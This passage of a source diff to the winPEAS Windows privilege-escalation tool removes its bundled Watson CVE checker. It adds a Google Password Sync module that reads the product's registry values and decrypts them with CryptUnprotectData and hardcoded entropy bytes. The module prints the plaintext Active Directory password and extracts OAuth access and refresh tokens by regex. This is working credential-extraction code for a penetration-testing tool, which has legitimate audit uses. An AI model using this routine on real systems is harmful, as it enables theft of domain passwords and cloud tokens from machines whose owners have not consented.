Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
}
var version = supportedVersions[buildNumber];
Console.WriteLine(" [*] OS Version: {0} ({1})", version, buildNumber);
}
else
{
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
}
// List of KBs installed
Console.WriteLine(" [*] Enumerating installed KBs...");
var installedKBs = Wmi.GetInstalledKBs();
#if DEBUG
Console.WriteLine();
foreach (var kb in installedKBs)
{
Console.WriteLine(" {0}", kb);
}
Console.WriteLine();
#endif
// List of Vulnerabilities
var vulnerabilities = new VulnerabilityCollection();
// Check each one
CVE_2019_0836.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_0841.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1064.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1130.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1253.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1315.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1385.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1388.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2019_1405.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2020_0668.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2020_0683.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2020_1013.Check(vulnerabilities, buildNumber, installedKBs);
CVE_2020_0796.Check(vulnerabilities, buildNumber, installedKBs);
// Print the results
vulnerabilities.ShowResults();
}
}
}

65
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Wmi.cs vendored
View File

@ -1,65 +0,0 @@
using System;
using System.Collections.Generic;
using System.Management;
namespace winPEAS._3rdParty.Watson
{
public class Wmi
{
public static List<int> GetInstalledKBs()
{
var KbList = new List<int>();
try
{
using (var searcher = new ManagementObjectSearcher(@"root\cimv2", "SELECT HotFixID FROM Win32_QuickFixEngineering"))
{
using (var hotFixes = searcher.Get())
{
foreach (var hotFix in hotFixes)
{
var line = hotFix["HotFixID"].ToString().Remove(0, 2);
if (int.TryParse(line, out int kb))
{
KbList.Add(kb);
}
}
}
}
}
catch (ManagementException e)
{
Console.Error.WriteLine(" [!] {0}", e.Message);
}
return KbList;
}
public static int GetBuildNumber()
{
try
{
using (var searcher = new ManagementObjectSearcher(@"root\cimv2", "SELECT BuildNumber FROM Win32_OperatingSystem"))
{
using (var collection = searcher.Get())
{
foreach (var num in collection)
{
if (int.TryParse(num["BuildNumber"] as string, out int buildNumber))
{
return buildNumber;
}
}
}
}
}
catch (ManagementException e)
{
Console.Error.WriteLine(" [!] {0}", e.Message);
}
return 0;
}
}
}

1
winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
View File

@ -17,6 +17,7 @@ namespace winPEAS.Checks
new GCPInfo(),
new GCPJoinedInfo(),
new GCDSInfo(),
new GPSInfo(),
};
foreach (var cloudInfo in cloudInfoList)

5
winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
View File

@ -5,7 +5,6 @@ using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using winPEAS._3rdParty.Watson;
using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Extensions;
@ -108,10 +107,6 @@ namespace winPEAS.Checks
};
Beaprint.DictPrint(basicDictSystem, colorsSI, false);
Console.WriteLine();
Watson.FindVulns();
//To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
//Usually you won't need to do anything with the classes Wmi, Vulnerability and VulnerabilityCollection
}
catch (Exception ex)
{

304
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GPSInfo.cs Normal file
View File

@ -0,0 +1,304 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using winPEAS.Helpers;
using System.Data.SQLite;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Parameters;
using Org.BouncyCastle.Crypto.Modes;
using System.Linq;
using Microsoft.Win32;
using System.Web.Script.Serialization;
using System.Text.RegularExpressions;
using System.Runtime.InteropServices;
namespace winPEAS.Info.CloudInfo
{
internal class GPSInfo : CloudInfoBase
{
public override string Name => "Google Password Sync";
public override bool IsCloud => CheckIfGPSInstalled();
private Dictionary<string, List<EndpointData>> _endpointData = null;
public static bool CheckIfGPSInstalled()
{
string[] check = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\Google Apps Password Sync");
bool regExists = check != null && check.Length > 0;
bool result = regExists || File.Exists(@"C:\Program Files\Google\Password Sync\PasswordSync.exe") || File.Exists(@"C:\Program Files\Google\Password Sync\password_sync_service.exe");
return result;
}
private List<EndpointData> GetGPSValues()
{
Dictionary<string, string> GPSRegValues = new Dictionary<string, string>();
// Check config file
string path_config = @"C:\ProgramData\Google\Google Apps Password Sync\config.xml";
if (File.Exists(path_config))
{
try
{
// Load the XML file
string xmlContent = File.ReadAllText(path_config);
// Extract values using Regex
string baseDN = ExtractValue(xmlContent, @"<baseDN>(.*?)<\/baseDN>");
string authorizedUsername = ExtractValue(xmlContent, @"<authorizedUsername>(.*?)<\/authorizedUsername>");
string anonymousAccess = ExtractValue(xmlContent, @"<useAnonymousAccess value=""(.*?)"" ");
// Output the extracted values
GPSRegValues.Add("BaseDN", baseDN);
GPSRegValues.Add("AnonymousAccess", anonymousAccess);
GPSRegValues.Add("authorizedUsername", authorizedUsername);
}
catch (Exception ex)
{
Beaprint.PrintException("Error accessing the Google Password Sync configuration from 'C:\\ProgramData\\Google\\Google Apps Password Sync\\config.xml'");
Beaprint.PrintException("Exception: " + ex.Message);
}
}
// Get registry valus and decrypt them
string hive = "HKLM";
string regAddr = @"SOFTWARE\Google\Google Apps Password Sync";
string[] subkeys = Helpers.Registry.RegistryHelper.GetRegSubkeys(hive, regAddr);
if (subkeys == null || subkeys.Length == 0)
{
Beaprint.PrintException("Winpeas need admin privs to check the registry for credentials");
}
else
{
GPSRegValues.Add("Email", Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"Email"));
// Check if AuthToken in the registry
string authtokenInReg = Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"AuthToken");
if (authtokenInReg.Length > 0)
{
try
{
Native.Advapi32 advapi = new Native.Advapi32();
byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };
// Decrypt auth token
byte[] encryptedEncodedAuthToken = advapi.ReadRegistryValue(regAddr, @"AuthToken");
byte[] decryptedData = DecryptData(encryptedEncodedAuthToken, entropyBytes);
string base32hexEncodedString = Encoding.Unicode.GetString(decryptedData).TrimEnd('\0');
// Decode decrypted auth token
byte[] originalData = Base32HexDecoder.Decode(base32hexEncodedString);
string plainAuthToken = Encoding.Unicode.GetString(originalData).TrimEnd('\0');
// Find tokens via regexes
string accessTokenRegex = @"ya29\.[a-zA-Z0-9_\-]{50,}";
string refreshTokenRegex = @"1//[a-zA-Z0-9_\-]{50,}";
MatchCollection accesTokens = Regex.Matches(plainAuthToken, accessTokenRegex);
MatchCollection refreshTokens = Regex.Matches(plainAuthToken, refreshTokenRegex);
if (refreshTokens.Count > 0)
{
GPSRegValues.Add("Decrypted refresh token", refreshTokens[0].Value);
}
if (accesTokens.Count > 0)
{
GPSRegValues.Add("Decrypted access token", accesTokens[0].Value);
}
}
catch (Exception ex)
{
Beaprint.PrintException("Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr + " (key: AuthToken)\nError was: " + ex.Message);
GPSRegValues.Add("authToken (error)", "Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr);
}
}
string adpasswordInReg = Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"ADPassword");
if (adpasswordInReg.Length > 0)
{
try
{
Native.Advapi32 advapi = new Native.Advapi32();
byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };
// Decrypt auth token
byte[] encryptedEncodedAuthToken = advapi.ReadRegistryValue(regAddr, @"ADPassword");
byte[] decryptedData = DecryptData(encryptedEncodedAuthToken, entropyBytes);
string plainPasswd = Encoding.Unicode.GetString(decryptedData).TrimEnd('\0');
GPSRegValues.Add("ADPassword decrypted", plainPasswd);
}
catch (Exception ex)
{
Beaprint.PrintException("Error trying to decrypt and decode the ADPassword. You will need to check it yourself. It's in " + hive + "\\" + regAddr + " (key: ADPassword)\nError was: " + ex.Message);
GPSRegValues.Add("ADPassword (error)", "Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr);
}
}
}
// Format the info in expected CloudInfo format
List <EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var kvp in GPSRegValues)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = kvp.Key,
Data = kvp.Value?.Trim(),
IsAttackVector = false
});
}
return _endpointDataList;
}
public string ExtractValue(string input, string pattern)
{
Match match = Regex.Match(input, pattern);
if (match.Success)
{
return match.Groups[1].Value;
}
return "Not found";
}
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("Local Info", GetGPSValues());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
public override bool TestConnection()
{
return true;
}
public byte[] DecryptData(byte[] encryptedData, byte[] entropyBytes)
{
Native.Crypt32.DATA_BLOB dataIn = new Native.Crypt32.DATA_BLOB();
Native.Crypt32.DATA_BLOB dataOut = new Native.Crypt32.DATA_BLOB();
Native.Crypt32.DATA_BLOB optionalEntropy = new Native.Crypt32.DATA_BLOB();
try
{
// Prepare the DATA_BLOB for input data
dataIn.pbData = Marshal.AllocHGlobal(encryptedData.Length);
dataIn.cbData = encryptedData.Length;
Marshal.Copy(encryptedData, 0, dataIn.pbData, encryptedData.Length);
// Initialize output DATA_BLOB
dataOut.pbData = IntPtr.Zero;
dataOut.cbData = 0;
// Prepare the DATA_BLOB for optional entropy
optionalEntropy.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
optionalEntropy.cbData = entropyBytes.Length;
Marshal.Copy(entropyBytes, 0, optionalEntropy.pbData, entropyBytes.Length);
// Call CryptUnprotectData with optional entropy
bool success = Native.Crypt32.CryptUnprotectData(
ref dataIn,
null,
ref optionalEntropy,
IntPtr.Zero,
IntPtr.Zero,
0,
ref dataOut);
if (!success)
throw new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error());
// Copy decrypted data to a byte array
byte[] decryptedData = new byte[dataOut.cbData + 2];
Marshal.Copy(dataOut.pbData, decryptedData, 0, dataOut.cbData);
return decryptedData;
}
finally
{
// Free allocated memory
if (dataIn.pbData != IntPtr.Zero)
Marshal.FreeHGlobal(dataIn.pbData);
if (dataOut.pbData != IntPtr.Zero)
Marshal.FreeHGlobal(dataOut.pbData);
if (optionalEntropy.pbData != IntPtr.Zero)
Marshal.FreeHGlobal(optionalEntropy.pbData);
}
}
}
}
public static class Base32HexDecoder
{
private static readonly char[] Alphabet = "0123456789abcdefghijklmnopqrstuv".ToCharArray();
private static readonly Dictionary<char, int> CharMap = new Dictionary<char, int>();
static Base32HexDecoder()
{
for (int i = 0; i < Alphabet.Length; i++)
{
CharMap[Alphabet[i]] = i;
}
}
public static byte[] Decode(string input)
{
input = input.ToLowerInvariant();
List<byte> bytes = new List<byte>();
int buffer = 0;
int bitsLeft = 0;
foreach (char c in input)
{
if (!CharMap.ContainsKey(c))
throw new ArgumentException("Invalid character in base32hex string.");
buffer = (buffer << 5) | CharMap[c];
bitsLeft += 5;
if (bitsLeft >= 8)
{
bitsLeft -= 8;
bytes.Add((byte)((buffer >> bitsLeft) & 0xFF));
}
}
return bytes.ToArray();
}
}

56
winPEAS/winPEASexe/winPEAS/Native/Advapi32.cs
View File

@ -1,4 +1,6 @@
using System;
using Microsoft.Win32;
using Microsoft.Win32.SafeHandles;
using System;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
@ -222,6 +224,58 @@ namespace winPEAS.Native
ref uint cchReferencedDomainName,
out SID_NAME_USE peUse);
// P/Invoke declaration for RegQueryValueExW
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern int RegQueryValueExW(
SafeRegistryHandle hKey,
string lpValueName,
IntPtr lpReserved,
out uint lpType,
byte[] lpData,
ref uint lpcbData);
public byte[] ReadRegistryValue(string keyPath, string valueName)
{
using (RegistryKey baseKey = Registry.LocalMachine) // Access HKLM
using (RegistryKey subKey = baseKey.OpenSubKey(keyPath, writable: false))
{
if (subKey == null)
throw new InvalidOperationException("Registry key not found.");
SafeRegistryHandle hKey = subKey.Handle;
uint lpType;
uint dataSize = 0;
// First call to determine the size of the data
int ret = RegQueryValueExW(
hKey,
valueName,
IntPtr.Zero,
out lpType,
null,
ref dataSize);
if (ret != 0)
throw new System.ComponentModel.Win32Exception(ret);
byte[] data = new byte[dataSize];
// Second call to get the actual data
ret = RegQueryValueExW(
hKey,
valueName,
IntPtr.Zero,
out lpType,
data,
ref dataSize);
if (ret != 0)
throw new System.ComponentModel.Win32Exception(ret);
return data;
}
}
public static string TranslateSid(string sid)
{
// adapted from http://www.pinvoke.net/default.aspx/advapi32.LookupAccountSid

27
winPEAS/winPEASexe/winPEAS/Native/crypt32.cs Normal file
View File

@ -0,0 +1,27 @@
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace winPEAS.Native
{
internal class Crypt32
{
// P/Invoke declaration for CryptUnprotectData
[StructLayout(LayoutKind.Sequential)]
public struct DATA_BLOB
{
public int cbData;
public IntPtr pbData;
}
[DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CryptUnprotectData(
ref DATA_BLOB pDataIn,
StringBuilder ppszDataDescr,
ref DATA_BLOB pOptionalEntropy,
IntPtr pvReserved,
IntPtr pPromptStruct,
int dwFlags,
ref DATA_BLOB pDataOut);
}
}

19
winPEAS/winPEASexe/winPEAS/winPEAS.csproj
View File

@ -1220,6 +1220,7 @@
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
<Compile Include="Info\CloudInfo\EndpointData.cs" />
<Compile Include="Info\CloudInfo\GPSInfo.cs" />
<Compile Include="Info\CloudInfo\GCDSInfo.cs" />
<Compile Include="Info\CloudInfo\GWorkspaceInfo.cs" />
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
@ -1378,6 +1379,7 @@
<Compile Include="Native\Enums\UserPrivType.cs" />
<Compile Include="Native\Enums\WTS_INFO_CLASS.cs" />
<Compile Include="Native\Iphlpapi.cs" />
<Compile Include="Native\crypt32.cs" />
<Compile Include="Native\Ntdll.cs" />
<Compile Include="Native\Kernel32.cs" />
<Compile Include="Native\Netapi32.cs" />
@ -1452,23 +1454,6 @@
<Compile Include="Helpers\ReflectionHelper.cs" />
<Compile Include="Helpers\Registry\RegistryHelper.cs" />
<Compile Include="Helpers\Search\SearchHelper.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-0836.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-0841.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1064.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1130.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1253.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1315.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1385.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1388.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1405.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-0668.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-0683.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-1013.cs" />
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-0796.cs" />
<Compile Include="3rdParty\Watson\Vulnerability.cs" />
<Compile Include="3rdParty\Watson\VulnerabilityCollection.cs" />
<Compile Include="3rdParty\Watson\Watson.cs" />
<Compile Include="3rdParty\Watson\Wmi.cs" />
<Compile Include="Wifi\Wifi.cs" />
<Compile Include="Wifi\NativeWifiApi\Interop.cs" />
<Compile Include="Wifi\NativeWifiApi\WlanClient.cs" />